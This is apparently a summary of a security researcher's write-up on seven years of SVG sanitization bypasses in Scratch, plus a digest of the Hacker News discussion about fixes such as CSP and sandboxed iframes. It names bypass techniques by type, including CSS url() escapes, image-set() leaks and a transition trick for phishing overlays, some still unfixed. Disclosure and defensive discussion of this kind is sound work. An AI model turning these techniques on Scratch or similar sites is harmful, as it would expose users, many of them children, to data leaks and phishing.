Scratch’s seven-year chain of SVG sanitization failures shows that parsing attacker-controlled SVGs into the live DOM is inherently unsafe regardless of sanitizer complexity.
Key Takeaways
Root cause: Scratch appends user-supplied SVGs into the main document for bounding-box measurement, making any sanitization approach a permanent game of whack-a-mole.
Vulnerability chain spans 2019-2026: regex bypass via <SCRIPT>, DOMPurify gaps for HTTP leaks, CSS @import, Paper.js receiving unsanitized input, CSS url() escape codes, and CSS image-set().
Each fix added complexity that introduced new bypasses; the 2026 url() patch missed escape codes, multi-url attributes, and CSS variable indirection all at once.
The page-restyling bug (using 9999s CSS transitions to persist styles after SVG removal) remains unfixed and enables phishing UI overlays on scratch.mit.edu.
The author disclosed image-set() and a future CSS Units/Images Level 4 leak to Scratch in 2025; neither is fixed after the disclosure window lapsed.
Hacker News Comment Review
Consensus: the only architecturally sound fix is CSP or true sandboxing; commenters pointed to <iframe sandbox srcdoc> with a strict CSP meta tag as the practical path, since sanitization cannot reliably block all CSS-level exfiltration channels.
Several commenters proposed restricting SVG to a safe structural subset (paths, fills, basic shapes) that covers the vast majority of real-world costume assets, trading feature completeness for a dramatically smaller attack surface.
Background context from the thread: Google Slides still lacks SVG import after 15 years for exactly this reason, and Cloudflare shipped svg-hush to handle the same class of problems, signaling how hard the general case is.
Notable Comments
@evilpie: The browser’s native HTML Sanitizer API allows a safe SVG subset by default but strips <style> entirely – useful baseline but CSS is still a gap.
@nmilo: “they found XSS in SVGs in a surface with attacker-controlled access to Node and their fix was sanitizing it using regex” – sharp criticism of Scratch’s security process and delayed timelines.
